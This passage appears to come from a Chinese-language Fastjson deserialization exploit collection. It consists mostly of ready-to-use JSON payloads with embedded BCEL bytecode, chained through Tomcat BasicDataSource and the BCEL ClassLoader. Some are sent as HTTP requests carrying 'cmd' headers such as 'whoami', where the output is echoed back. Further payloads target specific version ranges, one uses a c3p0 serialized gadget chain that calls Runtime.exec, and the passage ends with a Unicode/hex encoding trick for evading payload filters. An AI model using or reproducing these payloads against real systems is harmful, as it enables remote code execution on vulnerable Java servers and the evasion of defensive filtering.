                "driverClassName""$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$8dQMO$db$40$Q$7d$9b8$b1$e3$3a$N$84$86$96$7eB$81$S8$b0$Xn$m$O$ad$8aT$d5$z$a8A$f4$bc$d9l$c3$a6$8e7$b27$U$7e$Rg$$$808$f0$D$f8Q$88$f1$96R$qz$a8W$9e$d9$f9xo$de$d8W$d7$X$97$A$d6$f0$$D$80$a7$n$9ea$s$c0$f3$c2$bf$f0$f12D$F$af$7c$bc$f6$f1$86$a1$ba$a1Sm7$Z$ca$ed$e5$3d$G$ef$83$e9$v$86F$acS$f5u$3c$ec$aalWt$T$ca4c$pE$b2$t2$5d$c4$b7I$cf$ee$eb$9ca1$96f$c8S$cd$7f$88$dc$Or$93$e6v$dc$3b$e2$3d549$ff$a5$ba$fc$bdT$c9$3aC$b0$n$93$dbi$8c$d0$adx$m$O$E$d7$86$7f$da$fex$u$d5$c8j$93R$5b$bdc$85$fc$f9E$8c$dc$U$S$cc$Qv$cc8$93jK$XSk$F$ddj$81$8dPC$e8c6$c2$i$de$92$iR$u$p$ccc$81a$ea$l$dc$R$W$R2$cc$ff$87Z$86$JG$90$88$b4$cf$b7$bb$D$r$z$c3$e4$df$d4$b7qj$f5$90$c4$84$7de$ef$82V$7b9$7e$d0C$hy$eaPI$86$a5$f6$bdj$c7f$3a$ed$af$df$H$ecdF$aa$3c$t$40cDE$eb$be$c3n$s$a4$a2$fd$7c$fa$95$c5S$C$x$b6$s$fb$88$oN$9e$91$af$ac$9c$81$9d$b8rD$b6$ea$92$n$ead$a3$df$Nx$8c$G$f9$A$Tw$60$e1$c8$80$e69J$cd$f2$v$bc$ef$c7$I$3e$af$9c$a2z$e2$f25$c2VPv$8c$d3t$D$f1$d5$I$l$RW$9d$d8$s$e9$fc$99P$87GQ$93$a2$vz$7d$94b$lO$3c$w$b4$9c$a8$e9$h$fd$g$91$e0$94$C$A$A"
        }
    }: "bbb"
}

2、命令执行可回显poc

POST /json HTTP/1.1
cmd:whoami

{
    {
        "@type""com.alibaba.fastjson.JSONObject",
        "x":{
                "@type""org.apache.tomcat.dbcp.dbcp2.BasicDataSource",
                "driverClassLoader": {
                    "@type""com.sun.org.apache.bcel.internal.util.ClassLoader"
                },
                "driverClassName""$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$8dV$cb$5b$TW$U$ff$5dH27$c3$m$g$40$Z$d1$wX5$a0$q$7d$d8V$81Zi$c4b$F$b4F$a5$f8j$t$c3$85$MLf$e2$cc$E$b1$ef$f7$c3$be$ec$a6$df$d7u$X$ae$ddD$bf$f6$d3$af$eb$$$ba$ea$b6$ab$ae$ba$ea$7fP$7bnf$C$89$d0$afeq$ee$bd$e7$fe$ce$ebw$ce$9d$f0$cb$df$3f$3e$Ap$I$df$aaHbX$c5$IF$a5x$9e$e3$a8$8a$Xp$8ccL$c1$8b$w$U$e4$U$iW1$8e$T$i$_qLp$9c$e4x$99$e3$94$bc$9b$e4$98$e2$98VpZ$o$cep$bc$c2qVE$k$e7Tt$e2$3c$c7$F$b9$cep$bc$ca1$cbqQ$G$bb$c4qY$c1$V$VW$f1$9a$U$af$ab0PP$b1$h$s$c7$9c$5c$85$U$f3$i$L$iE$F$96$82E$86$c4$a8$e5X$c1Q$86$d6$f4$c0$F$86X$ce$9d$T$M$j$93$96$p$a6$x$a5$82$f0$ce$Z$F$9b4$7c$d4$b4$pd$7b$3e0$cc$a5$v$a3$5c$bb$a2j$U$yQ$z$94$ac$C$9b$fc2$a8y$b7$e2$99$e2$84$r$z$3b$f2e$cfr$W$c6$cd$a2$9bY4$96$N$N$H1$a4$a0$a4$c1$81$ab$a1$8ck$M$a3$ae$b7$90$f1k$b8y$cf$u$89$eb$ae$b7$94$b9$$$K$Z$d3u$C$b1$Sd$3cq$ad$o$fc$ms6$5cs$a1z$c2$b5$e7$84$a7$c0$d3$e0$p$60$e8Z$QA$84$Y$L$C$cf$wT$C$e1S$G2l$d66$9c$85l$ce6$7c_C$F$cb$M$9b$d7$d4$a7$L$8b$c2$M$a8$O$N$d7$b1$c2p$ec$ff$e6$93$X$de$b2$bda$d0$b6Z$$$7e$d9u$7c$oA$5d$cb$8ca$a7$M$bc$92$f1C$db5$lup$92$c03$9e$V$I$aa$eb$86$ccto$b3A1$I$ca$99$J$S$cd$d1C$c3$Ja$Q$tM$d5$e5$DY$88$867$f0$s$f5$d9$y$cd1$u$ae$9fq$a80$Foix$h$efhx$X$ef$d1$e5$cc$c9i$N$ef$e3$D$86$96$acI$b0l$c1r$b2$7e$91$8eC$a6$86$P$f1$R$e9$q$z$81$ed0l$a9$85$a8$E$96$9d$cd$9b$86$e3$c8V$7c$ac$e1$T$7c$aa$e13$7c$ae$e0$a6$86$_$f0$a5l$f8W$e4$e1$f2$98$86$af$f1$8d$86$5b2T$7c$de$aeH$c7q$d3ve$d1$9dk$f9$8e$af$98$a2$iX$$$85$e85$ddRv$de$f0$83E$dfu$b2$cb$V$8a$b4$3aM$M$3dk6$9e$98$b7$a9$85$d9$v$R$U$5d$w$b0$f3$d2$e4$a3$E$8c4$91r$ae$e8$RS4$cdf$c5$f3$84$T$d4$cf$5d$e9$81$c9GQd$d9M$d4FSW$9b$a1I7$a4Yo$827$5cI$9b$N$_$a8M6mj$gjmz$7d$9e$eb$3c$8e$84$ad$ad$d7vl$D$9bK$ebl$g$bd4$b3C$ee$S$96$b3$ec$$$R$edG$g$7d$85$cf$a0$c9W$a4$gX$af$a2$feSN$c7$85i$h$9e$98$ab$e7$d6$ee$8b$60$cc4$85$ef$5b$b5$efF$y$7dQ$7eW$g$a7$f1$86$l$88R$f8$40$cexnYx$c1$N$86$7d$ff$c1$c3j$L$db$C$f7$7c$99$8cr$86$9c$9a$e6n$ad$82$b8$7c$a7$86$e5$Q$c1$bd$8d$8esE$c3$cb$cb$d7$e2$98bd$e0$o$Be$5b$c3Nt$ae$ef$e4H$7d$c6k$aa$b3$V$t$b0J$f5$c7$5c$3ft7$99Ej2$8c$89$VA$_$u$9d$de$60$Q$h$z$88$C$c9Vs$a8H$c9$b0$89B$9dt$ca$95$80$y$85A$acm$ab$87$b3$dcl$c3$F$99$f7$a47$bc$90$eck$V_$i$X$b6U$92$df$U$86$fd$ff$ceu$e3c$96E84$ef$e8$c3$B$fa$7d$91$7f$z$60$f2$ebM2C$a7$9d$b42Z$e3$83w$c1$ee$d0$86$nK2QS$s$c0$f1D$j$da$d2O$O$da$Ip$f5$kZ$aahM$c5$aa$88$9f$gL$rZ$efC$a9$82O$k$60$b4KV$a1NE$80$b6$Q$a0$d5$B$83$a9$f6h$3b$7d$e0$60$84$j$8e$N$adn$e3$91$dd$s$b2Ku$84$d0$cd$c3$89H$bbEjS1$d2$ce$b6$a6$3a$f3$f2J$d1$VJ$a2KO$84R$8f$d5$3dq$5d$d1$e3$EM$S$b4$9b$a0$ea$cf$e8$iN$s$ee$93TS$5b$efa$5b$V$3d$v$bd$8a$ed$df$p$a5$ab$S$a3$ab$b1To$fe6$3a$e4qG$ed$b8$93d$5cO$e6u$5e$c5c$a9$5d$8d$91u$k$3a$ff$J$bbg$ef$a1OW$ab$e8$afb$cf$5d$3c$9e$da$5b$c5$be$w$f6$cb$a03$a1e$3a$aaD$e7Qz$91$7e$60$9d$fe6b$a7$eeH$e6$d9$y$bb$8cAj$95$ec$85$83$5e$92IhP$b1$8d$3a$d0G$bb$n$b4$e306$n$87$OLc3f$b1$F$$R$b8I$ffR$dcB$X$beC7$7e$c0VP$a9x$80$k$fc$K$j$bfa$3b$7e$c7$O$fcAM$ff$T$bb$f0$Xv$b3$B$f4$b11$f4$b3Y$ec$a5$88$7b$d8$V$ec$c7$93$U$edY$c4$k$S$b8M$c1S$K$9eVp$a8$$$c3M$b8$7fF$n$i$da$k$c2$93s$a3$e099$3d$87k$pv$e4$l$3eQL$40E$J$A$A"
        }
    }: "x"
}

POST /json HTTP/1.1
Host: 127.0.0.1:9092
Content-Type: application/json
cmd: ver && echo fastjson
Content-Length: 3327

{
    {
        "@type""com.alibaba.fastjson.JSONObject",
        "x":{
                "@type""org.apache.tomcat.dbcp.dbcp2.BasicDataSource",
                "driverClassLoader": {
                    "@type""com.sun.org.apache.bcel.internal.util.ClassLoader"
                },
                "driverClassName""$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$95W$Jx$Ug$Z$7e$t$bb$9b$99L$s$90$y$y$n$Jm9K$Sr$ARZ$S$K$84$40$m$92$84$98$NP$O$95$c9dH$W6$3bav$96$40$ab$b6JZ$5b$LZ$Lj9$d4$Kj$3c$f0$m$d1$r$82E$bc$82$d6$fb$3e$aax$l$f5$be$8b$8fJ$7d$ff$99$Nn$c8$96$3c$3e$cf$ce$7f$7e$ffw$be$df$f7$ff$fb$f4$b5$f3$X$B$y$c1U$V$c5x$m$H$ab$f1j$d1$bcF$c6A$V$7eo$a5_4$P$wxH$c5k$f1$b0$98$3c$a2$e0u$a2$7fT$c6$n$Vy8$ac$e2$f5x$83$ca$95$c7$c4$a97$8a$e6q1$3d$o$d8$kUQ$887$vx$b3$8c$b7$c8xB$cc$8e$c98$ae$a0I$c5$J$9c$U$8c$de$aa$a0C$c6$dbd$bc$5d$c5L$i$96$f1$a4$8a$d9$a2$7f$87$8a$b98$ac$e0$94$8a$d3x$a7$8a$e9x$97$82w$8b$7e$40$c1$7b$U$bcW$c1$fbd$bc_$c6$Z$V$l$c0$HE$f3$n$V$l$c6Y$V$d5$YT0$q$fa$8f$88$e6$a3$w$aa$90$U$cd9$d1$M$L5$3e$a6$e2$3c$$$88$e6$e3b$fa$94P$f9$a2$8cO$88$c9$ra$d3$te$7cJ$82$d4$zaJ$d3n$7d$9f$5e$9dp$o$d1$ea$f5z$bc$3bl$3a$b5$Sr$c2$91$ae$98$ee$qlS$c2$fc$f1$U$cb$bd$a5$a8$k$eb$aa$de$d8$b1$db4$9c$da$V$3c$95eD$r$U$a6$ed$d5G$f5x$bc$c9$d2$3bM$9b$db$be$ee$b8$z$a1$e0$c6$7do$a7$97$ad$d1$d3$v$n$98$b6$lv$ecH$ac$8b$E$92$3dv$p$r$94$h$3c$97$bd$3c$S$8b8$x$c8$a0$b4l$b3$E$7f$bd$d5I$b5$t7EbfK$a2$a7$c3$b4$db$f5$8e$a8$v$YX$86$k$dd$ac$db$R1O$zJ$fcf$df$a8R$8b$e54X$89X$e7$da$fd$86$d9$ebD$ac$Y$r$f9$9d$eeH$5c$c2$9c$a6x$a2$a7$c7$b4$e3$a6Qm$g$ddVu$bd$Vsl$x$g5$ed$ea$baht$z$97H$9c$XvtcO$b3$de$ebJ$a1$b3$J$u$ca$8aH$I$95$8e7$a3l$hu$b7$3avK$c8o6$9dn$ab$b3U$b7$f5$k$d3$a1$U$J$d32$ih$Uv$e6v$99N$9b$Z$ef$b5bq$daP$9cFe$9b$bb$a2$q$ab$f6$98Q$9dP$daf$baM$e9$867$d2$84$$$3dZg$Yf$3c$9eNT$99$81scl$l$7d$v$I$dau$9bz$a4$d3$cfJ$a3o$b1$c2$J$a3$db$d3$p$9d$s$d7$e8$d6$e9B$a7$85f$S7$bd$7d$d7u$8cX$d5$ad$M$ba$b3$c5$8e8$$j$qKB$a0$93$t$JV$a9$d1K$s$e6$RS$889$c7$a5$G$7e$7b$e9$f1N$d3$88$ea$b6$d9$d9$Q1$a3$84QQ$G$ad$dd$z$b2$M$c4$j$ddvx$$$e6f$ee$a7e$7c$86y$xAYnDSPR$c3V$c26$cc$86$88$c0$88$96$Kl$95$60$a9$e1$rh$d3$d0$82$8d$gZ$b1$91$80$k$97$k$g$ea$b1F$c3$3a$ac$970O$ec$ee$af$8a$9b$f6$be$a8$e9Tu$3bNo$d5z6ao$a1$cd$dc$9b0$e3$8e$8c$cfj$Y$c1e$N$8dx$b1$84$db$t$3a$e4E$5d$c3$GA$3ds$o$f4j$f8$i$dad$7c$5e$c3$d3$f8$82$868h$c4$X$f12$N_$S$cdKE$f3e$7cE$c3W$f15$a6$3e$c3$b9$de$U$v$cb$i$ba$813$Bzcrj$f8$3a$be1f$dd$c3$a8$8coj$f8$W$be$ad$a1$J$cd$y3$Z$A8F$f3$cc$f0$93$b0$e0$ff$A$9f$84$db$s$80$9e$E$d9$8aW$c5$88$3a$Z$df$d1$f0$5d$7cO$c3$f7$f1$MkH_$q$d6i$f5$J$bf$fc$80$c9$b8n$f5$G$c2dS$7bC$e5$5d$9eG$3c8$8e$da1$W$a4c$m$Q6$f4X$cc$b4e$fcP$c3$V$fcH$c3$8f$f1$T$Z$3f$d5$f03$fc$5c$40$e7$X$84$fb$8e$3a$N$bf$c4$af4$fc$g$cfhx$W$bf$d1$f0$5b$81$a9$df$89$e6$f7$f8$D$f1$a8$e1$8f$f8$93$86$3f$e3$_$g$fe$8a$bf$J$a8$e9$94$be$7d$7c$z$d0$f0w$R$bb$7f$e09$a6$de$84$b5$89$85b$fbM2$a3$f0$F$b6$98$9e$Z$ab$3a$9d$T$e5$m$F$8ey$a5$e3kwY$86r$3f$b9W8$cf$z$91$ed$b6n$98c$e0$d3$dem$T$7dLh$pa$dbf$cc$Z$9dO$zMg$e5$ad$92$97b$d0F$3d$S$a3x$9f$deI$3a$85$d1J$e93$a54$93$f4$fcH$bc$$$k$X$f7$hKs$83m$f5$I$de$e3$e8DM$W$81$f7$A$qaU$G$db$b6$8f$3fu$b3$w$3c$fd$85$f6$I$bf$I1$bd$87$8eX$96$a1$dag$IzY$a6$bb0$3d7$P$c4$j$b3$c7$bb$pZm$ab$d7$b4$9d$D$y$x$T$c4$e7$fau$9b$ebXMV$9fi$d7$eb$e2j$Z$eb$f9$ebD$rc$9c$c6z$k$W$b5$yf$98$ae$ef$K$fe$b7$d7$96$889$RQ$e7Uqc$8dNBc$b8$a6$96$c5$3dk$ee7$N$be$3a$s$d0$95V$89JQ$3bFRjQ$c2$qJj$8c$f5$s$I2$e2$84$8e$u$i$95$c6$d4M$db$e0$f1$f2$d2$8c$h$Z$a4$f3$ce$d5$Sqs$8d$Z$8d$f4xy$7f$T$r$d3$8b$81$b0$wf$ee$e7$8d$p$bb$c8$8f$c6nx$H$a4I$I$ec$8a$s$e2$bc$ea$CF$d4$S$ce$_$a0$rk$d2$af6Z7$a3$b4$ecfI$9c$c7$8b$d5$ab$a3$R$f7$89$e3$_$dd$s8$fb$c8$e9$G$M$dc$MM2$d3$c4$b6$f5$D$ee$b3$8a$B$cd$e3$f1p$82H2$bc$e4$K$89$3cc$ee$d1$ae1$F$a1h$7c$d2$a5$5e$80$98$c5gh1$9f$e52$UqCB$c2Z$ce$b2$d0$c09$_K$8e$Vq$ff$b9$fd$86T$cf$db$c3$edy$df$ba$7d$ab$db$Hx$96$d70$db0gI$f2$c8b$bf$bc$fc$i$qi$IY$fc$7c$X$e0$dfz$O$81$nd$PB$O$wI$e4$MA$V$c3$5cw$a8$N$40iZ$90$c4$a4aL$f6$N$p$ff$yyMC$F$l$d4y$f0$a1$9d$dc$aa$90$cbv2$9f$fc$F$94$h$84$86$v$a4$I$d1$KAWD$caB$y$e4$83$7d$JJP$8b$Z$d8D$eai$d4c$nOl$c6$W$f2$a3F$b8$H$5b$d9o$e3$97$8f$ac$e7yH$92$b1$5d4$3b$fcP$c5$dd$cb$Ta$97$o$cb$3dQ$5c$3e$82$bcAd$97$tQp$M$B$ff$Zo$i$dc$e2$3b$c3$5dO$b3$m$r$A$b7a$S$ffS$e4c$Ou$98$ebJ$d7$3c$Ox$b9$eb$p$n$d3$8f$acI$Sv$K$8fI$5c$GE$f2$o$f1Df$3d$82l$c1H$aa$y$c9_r$g$93$H$915$o$3c$e4$h$81$ffl$f90$a6$i$97B$5c$bb$8c$87$G$a1R$85$a9I$84$8e$e1$409$fd$cb$85$e04$ffS$u$dc$ea$LN$P$tQT$ceI1$t$r$9c$cc$b8$84$e9C$b8e$Q$b7$5c$86$w$a21$802$f2$n$83$e0$ad$3e$9e$nys$F$X8$$$s5C$c5P4$7b$84$8b$9b$x$92$985$80r$d1$cf$Z$c0l$d1$cf$h$401$d5$ba$8c$a9$83$d0$ae$x$oS$R$9f$abs$b7$absG$f0$f6a$ccO$a24X$96D$f91$u$c1$F$D$I$E$x$9ay$uX$99$SL$ca$94$d8K$a8j$a9$bc$80$ea$ad$c3XHU$93X$94$c4$e2$8asxQpI$Sw$q$b14$89$3b$x$93$b8$8b$df$b2$B$f8$9b$cf$96$97$f8w$ba8$J$a0$D$P$e0$m$fd$bf$I$P$e3Q$c6$40$f4G$f8$bfN$f4$t$Y$8b$Ri$a64$87$fb$5e$b4$k$e7$K0$9fQ$x$r$82$ca$Z$9f$F$a8$q$82$W$R$M$9b$88$96$ed$iu$e0$O$d8XJ$be$b5$e4$7c$t$fa$b1$8c$bc$ea$c9$fdn$i$c2$K$3c$c6$f1$R$ac$c4Q$ac$c2$T$i$9f$40$jN2$9b$9e$e4$f84$b3$u$c9$i$3a$cf$8c$Za$be$5ca$c6$5cE$8b4$9d$8f$d3$Zh$95f$oLm$da$a4$b9h$97$e6a$8bTAD$K$b4$ec$40$OeN$a2l$83$80$e8wQ$db$c9$d1$nwdrt$d4$j$ed$e2$e8$a4$3b$ea$e2$e8$K$a5vSB$We$94$o$82$dd$b4$92$Q$c2$k$Xsb$UE$Pq$u$d0W$8a$fc$m$fe$85$96$9d2b$fe$d52$acu2z$f9$ed$95$a7$cd$ac$93a$3f$87$b5$dc$Ba$u$Q$9a$93E$s$e0q$81$d2$f8$uJ$a5$7b$d8k$5c$eb$X$91$Xp$a8i$a9$bc$b8$d4$ef$5b$g$I$FB$feS0$xC$81$c55$d9E$d9$fe$qj$a5$g$b9H$a4$cbr$f6$b2$8b$94$bb$8fC$x$92K$86$b1b$A$d5E$f2$r$ac$e4$afF$vR$$$$$cd$f1$zUCj$u$e7$U$a6$V$v$nuqMnQ$ae$m$ecW$a5$81$e7$9f$rxj$94$fe$A$87$c7$vt$d5$d6$e6$cb$cf$3f$u$8a$c4$7cXt$dbhpW3$B$85$x$DL$e4$5b$99asi$ca$7c$ba$b4$9a$ae$ac$a1$T$eb$e94$83$O$8b$b0$b7h$abM$e78$a4$bd$X$7bq$lg$H9$T$c1XA$t$Y$fc$i$ba1$97$i$9a$5d$87$ca$e4$b9$Z$J$ec$e3$O$3d$80$3e$cf$c9$iyN$O$e0$7e$ecg$d8$b3$5cwWA$f97$C2$O$5cC$ae$8c$7b$r$e9$3fX$q$e3$3e$Z$af$b8$86$C$Z$x$r$e9$w$8a$Y$86$d8$3f$c1Q$60$d4$e9$7d$v$a7$xx$e5$f5$8a$3a$db$ad$q$M$E$abc$SuC$90$cf$8a$e0$ba$sg$bb$7b$K$dbW$b9$d5$fb$fe$ff$Ctz$ebem$R$A$A"
        }
    }: "x"
}

1.2.33<=fastjson<=1.2.36

{
    "name":
    {
        "@type" : "java.lang.Class",
        "val"   : "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"
    },
    "x" : {
        "name": {
            "@type" : "java.lang.Class",
            "val"   : "com.sun.org.apache.bcel.internal.util.ClassLoader"
        },
        {
            "@type":"com.alibaba.fastjson.JSONObject",
            "c": {
                "@type":"org.apache.tomcat.dbcp.dbcp2.BasicDataSource",
                "driverClassLoader": {
                    "@type" : "com.sun.org.apache.bcel.internal.util.ClassLoader"
                },
                "driverClassName":"$$BCEL..."
            }
        } : "ddd" 
    }
}

1.2.36<=fastjson<=1.2.47

利用的是ref的方式来调用任意的getter,比如这个Payload调用的是x.y.c.connection,x是这个大对象,最终调用的是c对象的connection方法,也就是BasicDataSource.connection。

{
    "name": {
        "@type""java.lang.Class",
        "val""org.apache.tomcat.dbcp.dbcp2.BasicDataSource"
    },
    "x": {
        "name": {
            "@type""java.lang.Class",
            "val""com.sun.org.apache.bcel.internal.util.ClassLoader"
        },
        "y": {
            "@type""com.alibaba.fastjson.JSONObject",
            "c": {
                "@type""org.apache.tomcat.dbcp.dbcp2.BasicDataSource",
                "driverClassLoader": {
                    "@type""com.sun.org.apache.bcel.internal.util.ClassLoader"
                },
                "driverClassName""$$BCEL...",
                "$ref""$.x.y.c.connection"
            }
        }
    }
}

c3p0#WrapperConnectionPoolDataSource

fastjson <1.2.47

<dependency>
    <groupId>com.mchange</groupId>
    <artifactId>c3p0</artifactId>
    <version>0.9.5.2</version>
</dependency>
{
    "e": {
        "@type""java.lang.Class",
        "val""com.mchange.v2.c3p0.WrapperConnectionPoolDataSource"
    },
    "f": {
        "@type""com.mchange.v2.c3p0.WrapperConnectionPoolDataSource",
        "userOverridesAsString""HexAsciiSerializedMap:ACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000103F400000000000027372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870707400136765744F757470757450726F7065727469657370737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C770800000010000000017371007E000B3F4000000000000C770800000010000000017372003A636F6D2E73756E2E6F72672E6170616368652E78616C616E2E696E7465726E616C2E78736C74632E747261782E54656D706C61746573496D706C09574FC16EACAB3303000649000D5F696E64656E744E756D62657249000E5F7472616E736C6574496E6465785B000A5F62797465636F6465737400035B5B425B00065F636C61737371007E00084C00055F6E616D6571007E00074C00115F6F757470757450726F706572746965737400164C6A6176612F7574696C2F50726F706572746965733B787000000000FFFFFFFF757200035B5B424BFD19156767DB37020000787000000001757200025B42ACF317F8060854E0020000787000000DCFCAFEBABE0000003400CD0A0014005F090033006009003300610700620A0004005F09003300630A006400650A003300660A000400670A000400680A0033006907006A0A0014006B0A0012006C08006D0B000C006E08006F0700700A001200710700720A007300740700750700760700770800780A0079007A0A0018007B08007C0A0018007D08007E08007F0800800B001600810700820A008300840A008300850A008600870A002200880800890A0022008A0A0022008B0A008C008D0A008C008E0A0012008F0A009000910A009000920A001200930A003300940700950A00120096070097010001680100134C6A6176612F7574696C2F486173685365743B0100095369676E61747572650100274C6A6176612F7574696C2F486173685365743C4C6A6176612F6C616E672F4F626A6563743B3E3B010001720100274C6A617661782F736572766C65742F687474702F48747470536572766C6574526571756573743B010001700100284C6A617661782F736572766C65742F687474702F48747470536572766C6574526573706F6E73653B0100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C65010004746869730100204C79736F73657269616C2F7061796C6F6164732F436F6D6D6F6E4563686F313B01000169010015284C6A6176612F6C616E672F4F626A6563743B295A0100036F626A0100124C6A6176612F6C616E672F4F626A6563743B01000D537461636B4D61705461626C65010016284C6A6176612F6C616E672F4F626A6563743B492956010001650100154C6A6176612F6C616E672F457863657074696F6E3B010008636F6D6D616E64730100135B4C6A6176612F6C616E672F537472696E673B0100016F01000564657074680100014907007607004C070072010001460100017101000D6465636C617265644669656C640100194C6A6176612F6C616E672F7265666C6563742F4669656C643B01000573746172740100016E0100114C6A6176612F6C616E672F436C6173733B07007007009807009901000A536F7572636546696C65010010436F6D6D6F6E4563686F312E6A6176610C003C003D0C003800390C003A003B0100116A6176612F7574696C2F486173685365740C0034003507009A0C009B009C0C005300480C009D00440C009E00440C004300440100256A617661782F736572766C65742F687474702F48747470536572766C6574526571756573740C009F00A00C00A100A2010003636D640C00A300A401000B676574526573706F6E736501000F6A6176612F6C616E672F436C6173730C00A500A60100106A6176612F6C616E672F4F626A6563740700A70C00A800A90100266A617661782F736572766C65742F687474702F48747470536572766C6574526573706F6E73650100136A6176612F6C616E672F457863657074696F6E0100106A6176612F6C616E672F537472696E670100076F732E6E616D650700AA0C00AB00A40C00AC00AD01000357494E0C009D00AE0100022F630100072F62696E2F73680100022D630C00AF00B00100116A6176612F7574696C2F5363616E6E65720700B10C00B200B30C00B400B50700B60C00B700B80C003C00B90100025C410C00BA00BB0C00BC00AD0700BD0C00BE00BF0C00C0003D0C00C100C20700990C00C300C40C00C500C60C00C700C80C003A00480100135B4C6A6176612F6C616E672F4F626A6563743B0C00C900A001001E79736F73657269616C2F7061796C6F6164732F436F6D6D6F6E4563686F3101001A5B4C6A6176612F6C616E672F7265666C6563742F4669656C643B0100176A6176612F6C616E672F7265666C6563742F4669656C640100106A6176612F6C616E672F54687265616401000D63757272656E7454687265616401001428294C6A6176612F6C616E672F5468726561643B010008636F6E7461696E73010003616464010008676574436C61737301001328294C6A6176612F6C616E672F436C6173733B010010697341737369676E61626C6546726F6D010014284C6A6176612F6C616E672F436C6173733B295A010009676574486561646572010026284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F537472696E673B0100096765744D6574686F64010040284C6A6176612F6C616E672F537472696E673B5B4C6A6176612F6C616E672F436C6173733B294C6A6176612F6C616E672F7265666C6563742F4D6574686F643B0100186A6176612F6C616E672F7265666C6563742F4D6574686F64010006696E766F6B65010039284C6A6176612F6C616E672F4F626A6563743B5B4C6A6176612F6C616E672F4F626A6563743B294C6A6176612F6C616E672F4F626A6563743B0100106A6176612F6C616E672F53797374656D01000B67657450726F706572747901000B746F55707065724361736501001428294C6A6176612F6C616E672F537472696E673B01001B284C6A6176612F6C616E672F4368617253657175656E63653B295A01000967657457726974657201001728294C6A6176612F696F2F5072696E745772697465723B0100116A6176612F6C616E672F52756E74696D6501000A67657452756E74696D6501001528294C6A6176612F6C616E672F52756E74696D653B01000465786563010028285B4C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F50726F636573733B0100116A6176612F6C616E672F50726F6365737301000E676574496E70757453747265616D01001728294C6A6176612F696F2F496E70757453747265616D3B010018284C6A6176612F696F2F496E70757453747265616D3B295601000C75736544656C696D69746572010027284C6A6176612F6C616E672F537472696E673B294C6A6176612F7574696C2F5363616E6E65723B0100046E6578740100136A6176612F696F2F5072696E745772697465720100077072696E746C6E010015284C6A6176612F6C616E672F537472696E673B2956010005666C7573680100116765744465636C617265644669656C647301001C28295B4C6A6176612F6C616E672F7265666C6563742F4669656C643B01000D73657441636365737369626C65010004285A2956010003676574010026284C6A6176612F6C616E672F4F626A6563743B294C6A6176612F6C616E672F4F626A6563743B0100076973417272617901000328295A01000D6765745375706572636C617373010040636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F72756E74696D652F41627374726163745472616E736C65740700CA0A00CB005F0021003300CB000000030008003400350001003600000002003700080038003900000008003A003B000000040001003C003D0001003E0000005C000200010000001E2AB700CC01B3000201B30003BB000459B70005B30006B8000703B80008B100000002003F0000001A0006000000140004001500080016000C001700160018001D001900400000000C00010000001E004100420000000A004300440001003E0000005A000200010000001A2AC6000DB200062AB6000999000504ACB200062AB6000A5703AC00000003003F0000001200040000001D000E001E001000210018002200400000000C00010000001A00450046000000470000000400020E01000A003A00480001003E000001D300050003000000EF1B1034A3000FB20002C6000AB20003C60004B12AB8000B9A00D7B20002C70051120C2AB6000DB6000E9900452AC0000CB30002B20002120FB900100200C7000A01B30002A7002AB20002B6000D121103BD0012B60013B2000203BD0014B60015C00016B30003A700084D01B30002B20002C60076B20003C6007006BD00184D1219B8001AB6001B121CB6001D9900102C03120F532C04121E53A7000D2C03121F532C041220532C05B20002120FB90010020053B20003B900210100BB002259B800232CB60024B60025B700261227B60028B60029B6002AB20003B900210100B6002BA700044DB12A1B0460B80008B100020047006600690017007A00E200E500170003003F0000006A001A000000250012002600130028001A0029002C002A0033002B0040002C0047002F0066003300690031006A0032006E0037007A003A007F003B008F003C0094003D009C003F00A1004000A6004200B3004400D7004500E2004700E5004600E6004800E7004B00EE004D00400000002A0004006A00040049004A0002007F0063004B004C0002000000EF004D00460000000000EF004E004F0001004700000022000B1200336107005004FC002D07005109FF003E0002070052010001070050000006000A005300480001003E000001580002000C000000842AB6000D4D2CB6002C4E2DBE360403360515051504A200652D1505323A06190604B6002D013A0719062AB6002E3A071907B6000DB6002F9A000C19071BB80030A7002F1907C00031C000313A081908BE360903360A150A1509A200161908150A323A0B190B1BB80030840A01A7FFE9A700053A08840501A7FF9A2CB60032594DC7FF85B100010027006F007200170003003F0000004200100000005000050052001E00530024005400270056002F0058003A00590043005B0063005C0069005B006F00620072006100740052007A0065007B00660083006800400000003E00060063000600540046000B0027004D004D00460007001E00560055005600060000008400570046000000000084004E004F00010005007F00580059000200470000002E0008FC000507005AFE000B07005B0101FD003107005C070052FE00110700310101F8001942070050F90001F800050001005D00000002005E707400016170770100787400017878737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000000787871007E000D78;"
    }
}

参考文章:

Java动态类加载,当FastJson遇到内网

Tomcat 加载bcel字节码

仅针对poc关键词进行简单混淆

Unicode/Hex编码绕过

{
  "rand1": {
    "\u0040\u0074\u0079\u0070\u0065""\x4c\x63\x6f\x6d\x2e\x73\x75\x6e\x2e\x72\x6f\x77\x73\x65\x74\x2e\x4a\x64\x62\x63\x52\x6f\x77\x53\x65\x74\x49\x6d\x70\x6c\x3b",
